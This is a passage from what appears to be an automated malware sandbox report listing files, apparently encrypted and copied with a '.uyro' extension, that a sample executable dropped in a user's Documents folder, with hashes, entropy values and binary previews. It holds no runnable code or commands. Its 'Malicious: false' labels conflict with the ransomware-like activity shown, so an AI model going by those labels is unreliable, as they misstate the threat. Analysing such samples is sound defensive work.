SHA-512:	13FE51288C638CD04BBF760574D8EF18541058E6F89046FECE9781A3C25815706C28DF0A3D3B3DECFD4C1D793437BA098FE9A5AF08E53403DCE93537ECB3CC89
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.o@.../...Bx...C...&YV...1...{...F.5Ax.,3A0.?...$.0...R@....F.pnCL....OS...I....B9.{.].M.......0j.=.!.k.B..f..F..<.........7.....#.I.}.ejx..Y[~.2.^...q=..;g...Xr...~C.x.._.<....wT.E.........=..?e?B.#.W..#V..m..+.u.+.]..Z.E.;Z.0...f...r..K.k.$W...b)...X.>H.vb./......P.......(}D..G.)!.v..`.....B.tY&.....:..S.\.N...<..Z}b./...;.t....G...^...A.:.[... k.;..V...#.T.........l.[...u..=........3.9..\|^.1..F...7.Z.=....bilZ...l..~......7.]."+..Qz...<......2.G.-7(c'...y.:s....?..2..$..z.V..rb..O...%3?..KFX^...%.m..=..5#t...x.y.o.3.....Z=.XBR.......%......H.h....[..N.I=RD...B.t.....zo..)z.#.S.[P\....qlv..>..T..$..J......A......B..N.../.>.J-...y.....u........n.b.....P.hk.G..b.:,k.u..c=..U:WL-B..]yW.....s.[.T..8.......W.....j.-d...&m.....>.r....;.....Y.......::... TcQ.{...6.E....W...+.w.^Up............s.#..8..qA.6..............bZ..Z.zNjI.."n..vt].....o..6.^... .....kl..ncl.A..\k....b0.!...........#..kH$bC....Dw....A+.SR.<0......w..:)..

C:\Users\user\Documents\WKXEWIOTXI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839738798134914
Encrypted:	false
SSDEEP:	24:smC3sY6xLarZdIhnHJbQx+puIq5AYJ9Vg7TtD6dTL5zSf4J97k1nXgNAnsAVbD:z6OaQhHg+pI5AYDC7mZ+f4J1k1QapFD
MD5:	B3CE6F204A59F88439F994ACFC78A5B7
SHA1:	B7FFA0E2C27C860ADE471C88D2E789962F0E9420
SHA-256:	F4931A16A48E3495149BB84A8B19D14318820126BDC7E4894BF7321A2FB84C9B
SHA-512:	13FE51288C638CD04BBF760574D8EF18541058E6F89046FECE9781A3C25815706C28DF0A3D3B3DECFD4C1D793437BA098FE9A5AF08E53403DCE93537ECB3CC89
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.o@.../...Bx...C...&YV...1...{...F.5Ax.,3A0.?...$.0...R@....F.pnCL....OS...I....B9.{.].M.......0j.=.!.k.B..f..F..<.........7.....#.I.}.ejx..Y[~.2.^...q=..;g...Xr...~C.x.._.<....wT.E.........=..?e?B.#.W..#V..m..+.u.+.]..Z.E.;Z.0...f...r..K.k.$W...b)...X.>H.vb./......P.......(}D..G.)!.v..`.....B.tY&.....:..S.\.N...<..Z}b./...;.t....G...^...A.:.[... k.;..V...#.T.........l.[...u..=........3.9..\|^.1..F...7.Z.=....bilZ...l..~......7.]."+..Qz...<......2.G.-7(c'...y.:s....?..2..$..z.V..rb..O...%3?..KFX^...%.m..=..5#t...x.y.o.3.....Z=.XBR.......%......H.h....[..N.I=RD...B.t.....zo..)z.#.S.[P\....qlv..>..T..$..J......A......B..N.../.>.J-...y.....u........n.b.....P.hk.G..b.:,k.u..c=..U:WL-B..]yW.....s.[.T..8.......W.....j.-d...&m.....>.r....;.....Y.......::... TcQ.{...6.E....W...+.w.^Up............s.#..8..qA.6..............bZ..Z.zNjI.."n..vt].....o..6.^... .....kl..ncl.A..\k....b0.!...........#..kH$bC....Dw....A+.SR.<0......w..:)..

C:\Users\user\Documents\WUTJSCBCFX.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845156755986112
Encrypted:	false
SSDEEP:	24:9xo8mDKvbK+/cRt4CngmIZpQeIMHmJxGjwuFlc7zzy7jq1gL37bv3bD:no8gQst4rma+eNk+2z/+LbD
MD5:	5B5BB6EAE3A5FE763AF9213A7863ED8F
SHA1:	98001A256575E4F067F20A04BE4E66A7E16FBAC9
SHA-256:	492582ED125C25CACB5A7F8BB9106F06F7A5AEFA6A20EF1A7F4EA0843CAC6ED7
SHA-512:	B96C7D75B31477AAC6C4429C7590789D002D9269950E5F2F0021A56FCBC29D47DD50955002D18F5D6EEF4606881871C18FEC12BC3B60403FB98A9351AB4B0BAA
Malicious:	false
Reputation:	unknown
Preview:	WUTJS3X5..-.bV.r.+o.:.8L..g..U.b..i%}?.;.......Rw...../..u.K.i..A.X.A..y (.C....+P..i..x.>......^....F.(..........M............f<.`2...<....:P<....Hs...N>H+J.b.Q..-..o.".5B..%=w.g.9..&.g..]........vCL..T.r,...!..G.. .B...\|.r.....] IJX...-y.WE...O.\|......Fa/...?u...]...[.<u.~..AX....".$D._..+..nE.........b..BdM....Ml_...\|<.rI....'...`K.Z.9..?......uV....&...U......!......N...k/.J.k...X....#...U...-?y"j.>Z.....A.....[.+&.....l.$..q....l...@=X~.e$)o.L/<.y..Q.1~.{.Aq7[.^.i..ix:.l....,p7....P...<"z%..b...es.h...)8M..>`.j.n.w..@..+...W..._.s.J..2.y_.].p57..8.:..8...mAD.E`....`.?a.r.Z...(..W'/.f{.....@..C..1g..$J@?..i_..{..... .f..L.......[.......9_v.D....Z..)...J.#....7.'.. ....O...*...C.N.l..s3.P.Sc..uP....O.}...[.t .g.`..-C&.\:y]%b./X..u...a..Q..."..]...Vr#.d.!.3".D...m.~x/..q.T.?3..u>...p!. ..&.BG./'"....KG..Q...Q.H......7.....e?..r]I.Ht0..PA.x.>..TLc..A..c..3\..2.v.%.7.....>l.u"{....dK.7C.?....t..Twb...H!V\|...I4.Y2....nt.uGXo.-H'

C:\Users\user\Documents\WUTJSCBCFX.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845156755986112
Encrypted:	false
SSDEEP:	24:9xo8mDKvbK+/cRt4CngmIZpQeIMHmJxGjwuFlc7zzy7jq1gL37bv3bD:no8gQst4rma+eNk+2z/+LbD
MD5:	5B5BB6EAE3A5FE763AF9213A7863ED8F
SHA1:	98001A256575E4F067F20A04BE4E66A7E16FBAC9
SHA-256:	492582ED125C25CACB5A7F8BB9106F06F7A5AEFA6A20EF1A7F4EA0843CAC6ED7
SHA-512:	B96C7D75B31477AAC6C4429C7590789D002D9269950E5F2F0021A56FCBC29D47DD50955002D18F5D6EEF4606881871C18FEC12BC3B60403FB98A9351AB4B0BAA
Malicious:	false
Reputation:	unknown
Preview:	WUTJS3X5..-.bV.r.+o.:.8L..g..U.b..i%}?.;.......Rw...../..u.K.i..A.X.A..y (.C....+P..i..x.>......^....F.(..........M............f<.`2...<....:P<....Hs...N>H+J.b.Q..-..o.".5B..%=w.g.9..&.g..]........vCL..T.r,...!..G.. .B...\|.r.....] IJX...-y.WE...O.\|......Fa/...?u...]...[.<u.~..AX....".$D._..+..nE.........b..BdM....Ml_...\|<.rI....'...`K.Z.9..?......uV....&...U......!......N...k/.J.k...X....#...U...-?y"j.>Z.....A.....[.+&.....l.$..q....l...@=X~.e$)o.L/<.y..Q.1~.{.Aq7[.^.i..ix:.l....,p7....P...<"z%..b...es.h...)8M..>`.j.n.w..@..+...W..._.s.J..2.y_.].p57..8.:..8...mAD.E`....`.?a.r.Z...(..W'/.f{.....@..C..1g..$J@?..i_..{..... .f..L.......[.......9_v.D....Z..)...J.#....7.'.. ....O...*...C.N.l..s3.P.Sc..uP....O.}...[.t .g.`..-C&.\:y]%b./X..u...a..Q..."..]...Vr#.d.!.3".D...m.~x/..q.T.?3..u>...p!. ..&.BG./'"....KG..Q...Q.H......7.....e?..r]I.Ht0..PA.x.>..TLc..A..c..3\..2.v.%.7.....>l.u"{....dK.7C.?....t..Twb...H!V\|...I4.Y2....nt.uGXo.-H'

C:\Users\user\Documents\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840916236142896
Encrypted:	false
SSDEEP:	24:984zDBbTU7a2Ok+AByM+yv4Xxf9rOnqdEeGt0u+iBmCgLjF3VWDhuu8wUubD:ZzDBEW2OvM+yv4hROnJPtL4Lj/WQxwUo
MD5:	0B0CFED95CA84E2D27CF4106394181A4
SHA1:	29C20AE3647AF837718F1DBD6BB6D1C1CD6625BC
SHA-256:	EB4804E4AC40D7D4DA6033A28F53FEB73C0D5B59282EABF480AAFA7D695EFF27
SHA-512:	7B1646BE035E7466E36DFF216C6F1C77AB16AD7BA7A71333429F93AE307F1C3F1A9E104DE44572F9411D8951196C93A231AF419E25B14E8C07A955B350C7613F
Malicious:	false
Reputation:	unknown
Preview:	WUTJS.../...k.9.L(5..z...#t..z.....=.a..G.r.#..=l...h.?..G.R.sAB......j...G.~..X.T.t}.....\|..y..b..(.<1....C^..26....o.gN.%.O.V.....).:....f^..o..fH..^L08.45..d.D..,X.F....eb..<IY.1lk..@.q2P.(..P..B;.3Y......1\._n!.<S....&.......&3.6.'.P._.,.:...!.6.........X.'..pt.A..o..qP...MV,M.X.3.+...AyL.C...aj..." :gh.n0.. y.....P...n..VBj........R.....I>.c.c}..D.-'.:.1....Ky-X........#.Cg.....~..}7.................3..a.:....(.J."..83W...X.N.i....'....p.o...3..C..FL..U$H.\.,K..&...,..;.E.hh...$t..51..).+.4.]. ./.1gj. ...d.,..@A..B..?...b.......Pq....5V+..HC.....>_F..TW......@E.;.XA.i..jT..+(20.e.:....o......\| F.%K.....`..7.4........uE.A..3y......e..r.p.,.>.../..I...Z8..........A.hX.....~...........m....y.<..).@.....o.'5.u.C.i..K.....)......\|..3.f.=..J-.4.K.}kI.B.kow....L.i1jP6. .....0`\|.........p.....2.\EgJ=.......r...X"....#M...z.o....!Bv.]i7...u......(.ju.r....@_.oi]T..5}..H..qu......8Us.s?5..N....z...l..\|..B..W....).......@.....=,.....+2..H.K..R$S

C:\Users\user\Documents\WUTJSCBCFX.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840916236142896
Encrypted:	false
SSDEEP:	24:984zDBbTU7a2Ok+AByM+yv4Xxf9rOnqdEeGt0u+iBmCgLjF3VWDhuu8wUubD:ZzDBEW2OvM+yv4hROnJPtL4Lj/WQxwUo
MD5:	0B0CFED95CA84E2D27CF4106394181A4
SHA1:	29C20AE3647AF837718F1DBD6BB6D1C1CD6625BC
SHA-256:	EB4804E4AC40D7D4DA6033A28F53FEB73C0D5B59282EABF480AAFA7D695EFF27
SHA-512:	7B1646BE035E7466E36DFF216C6F1C77AB16AD7BA7A71333429F93AE307F1C3F1A9E104DE44572F9411D8951196C93A231AF419E25B14E8C07A955B350C7613F
Malicious:	false
Reputation:	unknown
Preview:	WUTJS.../...k.9.L(5..z...#t..z.....=.a..G.r.#..=l...h.?..G.R.sAB......j...G.~..X.T.t}.....\|..y..b..(.<1....C^..26....o.gN.%.O.V.....).:....f^..o..fH..^L08.45..d.D..,X.F....eb..<IY.1lk..@.q2P.(..P..B;.3Y......1\._n!.<S....&.......&3.6.'.P._.,.:...!.6.........X.'..pt.A..o..qP...MV,M.X.3.+...AyL.C...aj..." :gh.n0.. y.....P...n..VBj........R.....I>.c.c}..D.-'.:.1....Ky-X........#.Cg.....~..}7.................3..a.:....(.J."..83W...X.N.i....'....p.o...3..C..FL..U$H.\.,K..&...,..;.E.hh...$t..51..).+.4.]. ./.1gj. ...d.,..@A..B..?...b.......Pq....5V+..HC.....>_F..TW......@E.;.XA.i..jT..+(20.e.:....o......\| F.%K.....`..7.4........uE.A..3y......e..r.p.,.>.../..I...Z8..........A.hX.....~...........m....y.<..).@.....o.'5.u.C.i..K.....)......\|..3.f.=..J-.4.K.}kI.B.kow....L.i1jP6. .....0`\|.........p.....2.\EgJ=.......r...X"....#M...z.o....!Bv.]i7...u......(.ju.r....@_.oi]T..5}..H..qu......8Us.s?5..N....z...l..\|..B..W....).......@.....=,.....+2..H.K..R$S

C:\Users\user\Documents\WUTJSCBCFX\BPMLNOBVSB.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8304044435374855
Encrypted:	false
SSDEEP:	24:xOjhc3yUwxo6FPoY7ov6Cp6n2W+O6uHCb4u8cd2XubJFxNwtQ932pFDzpKU2VbD:QVcDdcCp0HTJG2XuHxStQZ2pFAU2FD
MD5:	3FC48FFC464AFC275F066AF81FA7DC35
SHA1:	DADC48E55B8D5B8C3064EF1873CE1554928430BA
SHA-256:	04FF053A529FC9560E100A12CE03E5FD5E43FE4366E2F1E6228F5803DA546664
SHA-512:	9EE354E7EDF39CDCC427A507491BA2F20A9835572279C2A63FDDF2F81F197ADC140733F306E16E879275A4B470EF3CCBF69C1ED037DC96305F506222E38CCC7C
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....+...J.D..%j.FLF..x.Nx.......r....8....D........I.a7..P..a./.!`.)..#.?.{.4....vc..^...O;...j.^.2.u...q..3.".PX.(}...G.zR..>...c..Q&...~b.k...q.#n=.....r.n.0.^Y....Q....2.%W.Xit<....2...[.).z+9A.&..Xe{.7w..(i_.g..H]=.N.{\|c...A\.$.Q(....N.Jy.U...+u...7'<.......Y......^a....{.P..........njJXY.{..V.b:}?`0eDF.A.X.....+.h5..R.pW..NU....^..P.Pw.$....-..&....u.oLXC..;4....el.j..#".v...5..-..w.....D]...L..Y..d.... O...V.W..p....\8.......}....6u.6..=...&....P.X....w..a...-....z2. ._...H~...ZA(a.".'.T......{\|6.....:.e[.C..c.j....._..X.i..A..5..fP]$.R.I.?.W..I.B...v./.>,....La`d..i...g.g}.....&F...hYy-..Rq.fM.....s.H.^qS!X..Pe...~..^a..N....2...m....{.`...K.a...4.C.x..hX......}8<...!..0."..(.I\|I.T....1".2.{...<,..R...D.r..J..#..@.,..q4.n.....t4...w_..^>... P9.U'U..X:L.d.W........Nw~........`.6rA;r`...q......n.s.#:i.E.B.RHB.).=...D.z...}...f<...V.f[5..v.[.^+..9.K[..,..(.RL.Yg2.V....@...Cs.p1.9...m.O.\k.....m.....c...?:..q[.i9...yr..F.

C:\Users\user\Documents\WUTJSCBCFX\BPMLNOBVSB.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8304044435374855
Encrypted:	false
SSDEEP:	24:xOjhc3yUwxo6FPoY7ov6Cp6n2W+O6uHCb4u8cd2XubJFxNwtQ932pFDzpKU2VbD:QVcDdcCp0HTJG2XuHxStQZ2pFAU2FD
MD5:	3FC48FFC464AFC275F066AF81FA7DC35
SHA1:	DADC48E55B8D5B8C3064EF1873CE1554928430BA
SHA-256:	04FF053A529FC9560E100A12CE03E5FD5E43FE4366E2F1E6228F5803DA546664
SHA-512:	9EE354E7EDF39CDCC427A507491BA2F20A9835572279C2A63FDDF2F81F197ADC140733F306E16E879275A4B470EF3CCBF69C1ED037DC96305F506222E38CCC7C
Malicious:	false
Reputation:	unknown
Preview:	BPMLN....+...J.D..%j.FLF..x.Nx.......r....8....D........I.a7..P..a./.!`.)..#.?.{.4....vc..^...O;...j.^.2.u...q..3.".PX.(}...G.zR..>...c..Q&...~b.k...q.#n=.....r.n.0.^Y....Q....2.%W.Xit<....2...[.).z+9A.&..Xe{.7w..(i_.g..H]=.N.{\|c...A\.$.Q(....N.Jy.U...+u...7'<.......Y......^a....{.P..........njJXY.{..V.b:}?`0eDF.A.X.....+.h5..R.pW..NU....^..P.Pw.$....-..&....u.oLXC..;4....el.j..#".v...5..-..w.....D]...L..Y..d.... O...V.W..p....\8.......}....6u.6..=...&....P.X....w..a...-....z2. ._...H~...ZA(a.".'.T......{\|6.....:.e[.C..c.j....._..X.i..A..5..fP]$.R.I.?.W..I.B...v./.>,....La`d..i...g.g}.....&F...hYy-..Rq.fM.....s.H.^qS!X..Pe...~..^a..N....2...m....{.`...K.a...4.C.x..hX......}8<...!..0."..(.I\|I.T....1".2.{...<,..R...D.r..J..#..@.,..q4.n.....t4...w_..^>... P9.U'U..X:L.d.W........Nw~........`.6rA;r`...q......n.s.#:i.E.B.RHB.).=...D.z...}...f<...V.f[5..v.[.^+..9.K[..,..(.RL.Yg2.V....@...Cs.p1.9...m.O.\k.....m.....c...?:..q[.i9...yr..F.

C:\Users\user\Documents\WUTJSCBCFX\FENIVHOIKN.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840683438615337
Encrypted:	false
SSDEEP:	24:o4ey9ELporxpZp4O0aQiUyFR54UL/im1KDzLLMd6m5ARbD:o4eTsgbjW/im1YPXmwD
MD5:	DFD5B0209BF94B162D2DC8FEEC84965D
SHA1:	59407F0A5671D8F5900ED74F45C9453005265886
SHA-256:	FED0C2B6AE97F5E3CE0BE83261376A0C5DE61696C3187096C5C172EA8397C64F
SHA-512:	5431BBD09830A3B92175D47F00289473CD8A58D2EBF7EF437BA69B84AA84D90E645A86D043213490E781E5327CAE9BCF52BFEC65315549F8C4781637770C5ACE
Malicious:	false
Reputation:	unknown
Preview:	FENIV(..<.]_].....~...Fas.8..<.e....cj.\.......W.d.....z....E.'#........E.6...Z.Msu.H......B........&.../.4..`..7.k^.lz.@..%.RX.t.a.b..G.QL.."..t..k1D....3.,z76.6ty.....u.i...H.A.`R..r..d..j...Ti...s...C6vx.]..4.p...l.<.)..v1S...C....[..$.Y7.N....<7.: ..F.fD!.8.3)....%?......C...d.4a..........s.,.u~".F..8+4~jm.u._...e..<.....p..P.~..2.x.Q..0.Ej.}.8...n....C.6.....q....M..%..3..H.@...Q....`.......[.<;b..].x.#.p.A...2{....m..c_...U.3...b.pE.r.:.t.D\Z...m..~....../..T\|...B..Q.7..H.A...4>.nGt.v5\:..x...f....C.k.Fea.W.bFs.A&...L...1.....E....bn.>.tM........2..1.W.X.B.d...m....]6{.N..B@.%6...W7.O.d...]+.....A....$.k5.V..4_"......G.L?z:~jd..A.....U.P.....=..8..i...]'....!.c%.q....pu..@)..p....a..0..........pCC6S..6B..y..0Y.Hl...V.j....V..9..2...\|T..;..pV..[._.j...M.....>.,o.ih,.._.c..$.@j..m)<..,..Lm.F(J..6.\|.d.A....nc...DQ......aoy..../...g.;..`+v.w.*.x."4....F..._<....Ji..6...0...`/i..(..]...kl.J...G...z.h..S..n..,n.Q......q.P.39.`......-J.9.....x

C:\Users\user\Documents\WUTJSCBCFX\FENIVHOIKN.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840683438615337
Encrypted:	false
SSDEEP:	24:o4ey9ELporxpZp4O0aQiUyFR54UL/im1KDzLLMd6m5ARbD:o4eTsgbjW/im1YPXmwD
MD5:	DFD5B0209BF94B162D2DC8FEEC84965D
SHA1:	59407F0A5671D8F5900ED74F45C9453005265886
SHA-256:	FED0C2B6AE97F5E3CE0BE83261376A0C5DE61696C3187096C5C172EA8397C64F
SHA-512:	5431BBD09830A3B92175D47F00289473CD8A58D2EBF7EF437BA69B84AA84D90E645A86D043213490E781E5327CAE9BCF52BFEC65315549F8C4781637770C5ACE
Malicious:	false
Reputation:	unknown
Preview:	FENIV(..<.]_].....~...Fas.8..<.e....cj.\.......W.d.....z....E.'#........E.6...Z.Msu.H......B........&.../.4..`..7.k^.lz.@..%.RX.t.a.b..G.QL.."..t..k1D....3.,z76.6ty.....u.i...H.A.`R..r..d..j...Ti...s...C6vx.]..4.p...l.<.)..v1S...C....[..$.Y7.N....<7.: ..F.fD!.8.3)....%?......C...d.4a..........s.,.u~".F..8+4~jm.u._...e..<.....p..P.~..2.x.Q..0.Ej.}.8...n....C.6.....q....M..%..3..H.@...Q....`.......[.<;b..].x.#.p.A...2{....m..c_...U.3...b.pE.r.:.t.D\Z...m..~....../..T\|...B..Q.7..H.A...4>.nGt.v5\:..x...f....C.k.Fea.W.bFs.A&...L...1.....E....bn.>.tM........2..1.W.X.B.d...m....]6{.N..B@.%6...W7.O.d...]+.....A....$.k5.V..4_"......G.L?z:~jd..A.....U.P.....=..8..i...]'....!.c%.q....pu..@)..p....a..0..........pCC6S..6B..y..0Y.Hl...V.j....V..9..2...\|T..;..pV..[._.j...M.....>.,o.ih,.._.c..$.@j..m)<..,..Lm.F(J..6.\|.d.A....nc...DQ......aoy..../...g.;..`+v.w.*.x."4....F..._<....Ji..6...0...`/i..(..]...kl.J...G...z.h..S..n..,n.Q......q.P.39.`......-J.9.....x

C:\Users\user\Documents\WUTJSCBCFX\KZWFNRXYKI.xlsx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872563010803269
Encrypted:	false
SSDEEP:	24:/vIZH2qAphct0lYt3rrBWTnuzqaBHYH09pepz628WMwjUKNUuopwbD:/vLtYt3rdW7uzRH19MejWMwEUD
MD5:	249C00A7A4F9685EB6B40A475FE2C392
SHA1:	6B37AEFECB9D943124B7E8CA28B07EE8121861F3
SHA-256:	BF36DB4D8A9450A41674C265040E2F7A769A7A6E4941212358F1AA386E7EBF44
SHA-512:	60D04B4410EDDEC2807ACB36AA580471DFA5D0A9DA87017091B2266EB096BFA1E553C8BB92D271F664836F457B557523AC84B8768B6CAAC38F09CA7E90D96E20
Malicious:	false
Reputation:	unknown
Preview:	KZWFN)5.w?R...@K.q...\|]~.'.}.K.A..........!NO..8...TU.9...f.^-(.y..\<...i....tT...u.av{..\.h..A<...G..j .8.).2-`.(~h...s...Z......U.....O..-e.``iO.....GOs.^...<...#.).......z.L ......V.Fbui..<..g..$......B..\|5.."F.w.K.$L....Y...kf..-............+..M..k......1E.c.rdI%gZ..EJ.$.J.6}pIs3.9_..r+...4......G.a.EJ..8g-...2Q.\...?V`4..h..R....D.;0..Yo........Z.......CP..W.tv .^k .no1.f.tA ..b...~.d...DG..5.$...!.v\x..Y.....{_U..Ui_.7.Q;.}..<y..:J6.^KL ..._.d..}E...a... #.1+...sm<.(t.J..:..%=.9RD..m...T......^,.1..n..../..b......D."...rO...9.D..A6R..uH\C!.Q....y.hL.~4 ...j'.TwR...xX.k.#./.%)qc.G?Q%..m]...ou?.%ls#X.ej...O?.M.g..977.pW 05.;.(....d.....t`.......p.F...7I..X}K..aW.........,a..x.... 27.M.]!\dQm1....U!-..f....\......%..f...V`{@.:............cqR...*...DW.../..q....M...\|..N.0.8..^qL.:@.,.,....f.~Y.....9....^).p...P..]...D.........q.1...y.=QQ.Y...)...D....@..q.~...;%.......J.~.h...2."..Q...>..E..2..0(.js,,?.~{.[...a..T[...,9....M.&I

C:\Users\user\Documents\WUTJSCBCFX\KZWFNRXYKI.xlsx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872563010803269
Encrypted:	false
SSDEEP:	24:/vIZH2qAphct0lYt3rrBWTnuzqaBHYH09pepz628WMwjUKNUuopwbD:/vLtYt3rdW7uzRH19MejWMwEUD
MD5:	249C00A7A4F9685EB6B40A475FE2C392
SHA1:	6B37AEFECB9D943124B7E8CA28B07EE8121861F3
SHA-256:	BF36DB4D8A9450A41674C265040E2F7A769A7A6E4941212358F1AA386E7EBF44
SHA-512:	60D04B4410EDDEC2807ACB36AA580471DFA5D0A9DA87017091B2266EB096BFA1E553C8BB92D271F664836F457B557523AC84B8768B6CAAC38F09CA7E90D96E20
Malicious:	false
Reputation:	unknown
Preview:	KZWFN)5.w?R...@K.q...\|]~.'.}.K.A..........!NO..8...TU.9...f.^-(.y..\<...i....tT...u.av{..\.h..A<...G..j .8.).2-`.(~h...s...Z......U.....O..-e.``iO.....GOs.^...<...#.).......z.L ......V.Fbui..<..g..$......B..\|5.."F.w.K.$L....Y...kf..-............+..M..k......1E.c.rdI%gZ..EJ.$.J.6}pIs3.9_..r+...4......G.a.EJ..8g-...2Q.\...?V`4..h..R....D.;0..Yo........Z.......CP..W.tv .^k .no1.f.tA ..b...~.d...DG..5.$...!.v\x..Y.....{_U..Ui_.7.Q;.}..<y..:J6.^KL ..._.d..}E...a... #.1+...sm<.(t.J..:..%=.9RD..m...T......^,.1..n..../..b......D."...rO...9.D..A6R..uH\C!.Q....y.hL.~4 ...j'.TwR...xX.k.#./.%)qc.G?Q%..m]...ou?.%ls#X.ej...O?.M.g..977.pW 05.;.(....d.....t`.......p.F...7I..X}K..aW.........,a..x.... 27.M.]!\dQm1....U!-..f....\......%..f...V`{@.:............cqR...*...DW.../..q....M...\|..N.0.8..^qL.:@.,.,....f.~Y.....9....^).p...P..]...D.........q.1...y.=QQ.Y...)...D....@..q.~...;%.......J.~.h...2."..Q...>..E..2..0(.js,,?.~{.[...a..T[...,9....M.&I

C:\Users\user\Documents\WUTJSCBCFX\WKXEWIOTXI.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853685957298473
Encrypted:	false
SSDEEP:	24:wSulLUrmVJ8V/493wkVlUVeti60oSdfsOPvhDw8/I7Xdn/tVdg5XpiGVVMMlAAuX:6mqfqoAkVlUV8rUfsOPg7dnKsGIGAAMD
MD5:	2B356E0FF21D9144032B73AAD492CCD3
SHA1:	6B2B7AF97F0320D707EB1A2D29634D827067CBEE
SHA-256:	D268152386F1291AEF5A223BCD1ACE3C1C0EE9ABAE7C8B98E9D046F726623189
SHA-512:	B82D5F6393E2A3003698C5A9AE7049794773785E75536088E34F630B119E4A49CB6EB4F0493210E7721184AB160FA2CFB2FC05C34505F3EE4B9B6BE25BB65C45
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.x.;.,4J.a9....{..Tp]...g4....vJ...1....wF....J{.F.}..............\|.."......(,.n..HX.....wX..xz(..x.S.z......XQ.,@...%..'.....l.k\..w..!.9.../..Z....q...+>.Y.@...V.}.M..2....^..e.....rEb.9.^..z..?.....J].w...K.i...."_..rP.z......A<...{....... ...-.sg.!.....v.q....sT6Bp=...?......J.T.......T...Y.=t.W..#.\|......C..i....M....BX.d.+.,..o.T.E.a.;Nt........q.$.\|.6n......?.[..OdL..rgqS..u.........q..F/h..s.O......>z..#lY.Kz..o....pgz...f..9.B..-..g6.%...'...V.........\.[TE.$...k.1B..)..-.O..;..........F..SNO.......Z^..r1.i.E.2.J5.e.*._f....:...C'.P......{...q\|.....V/c...E..}.b.1M.'....V.w_..}..m,....v...@E..}..F.D....l.<..h.\|.4.....c.y[`7.4s.........T..9.}5.3.y... ....1B;..r.n..o.RO/......H6..P...#.%/.q......[i.....9....s.-.#.:}...(....\|.8..Tk...N.....T..)...........8j...3...aGu'P............Cit..DYH.r."..n=7..{(\|..<....X...S&...z...9.....s.z.%...0....[....\.03o.#a...y.....L.X.0h...~...uk6..........0.B..5'Z.4B.\LWB..)e0.jX......

C:\Users\user\Documents\WUTJSCBCFX\WKXEWIOTXI.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853685957298473
Encrypted:	false
SSDEEP:	24:wSulLUrmVJ8V/493wkVlUVeti60oSdfsOPvhDw8/I7Xdn/tVdg5XpiGVVMMlAAuX:6mqfqoAkVlUV8rUfsOPg7dnKsGIGAAMD
MD5:	2B356E0FF21D9144032B73AAD492CCD3
SHA1:	6B2B7AF97F0320D707EB1A2D29634D827067CBEE
SHA-256:	D268152386F1291AEF5A223BCD1ACE3C1C0EE9ABAE7C8B98E9D046F726623189
SHA-512:	B82D5F6393E2A3003698C5A9AE7049794773785E75536088E34F630B119E4A49CB6EB4F0493210E7721184AB160FA2CFB2FC05C34505F3EE4B9B6BE25BB65C45
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.x.;.,4J.a9....{..Tp]...g4....vJ...1....wF....J{.F.}..............\|.."......(,.n..HX.....wX..xz(..x.S.z......XQ.,@...%..'.....l.k\..w..!.9.../..Z....q...+>.Y.@...V.}.M..2....^..e.....rEb.9.^..z..?.....J].w...K.i...."_..rP.z......A<...{....... ...-.sg.!.....v.q....sT6Bp=...?......J.T.......T...Y.=t.W..#.\|......C..i....M....BX.d.+.,..o.T.E.a.;Nt........q.$.\|.6n......?.[..OdL..rgqS..u.........q..F/h..s.O......>z..#lY.Kz..o....pgz...f..9.B..-..g6.%...'...V.........\.[TE.$...k.1B..)..-.O..;..........F..SNO.......Z^..r1.i.E.2.J5.e.*._f....:...C'.P......{...q\|.....V/c...E..}.b.1M.'....V.w_..}..m,....v...@E..}..F.D....l.<..h.\|.4.....c.y[`7.4s.........T..9.}5.3.y... ....1B;..r.n..o.RO/......H6..P...#.%/.q......[i.....9....s.-.#.:}...(....\|.8..Tk...N.....T..)...........8j...3...aGu'P............Cit..DYH.r."..n=7..{(\|..<....X...S&...z...9.....s.z.%...0....[....\.03o.#a...y.....L.X.0h...~...uk6..........0.B..5'Z.4B.\LWB..)e0.jX......

C:\Users\user\Documents\WUTJSCBCFX\WUTJSCBCFX.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843529613881958
Encrypted:	false
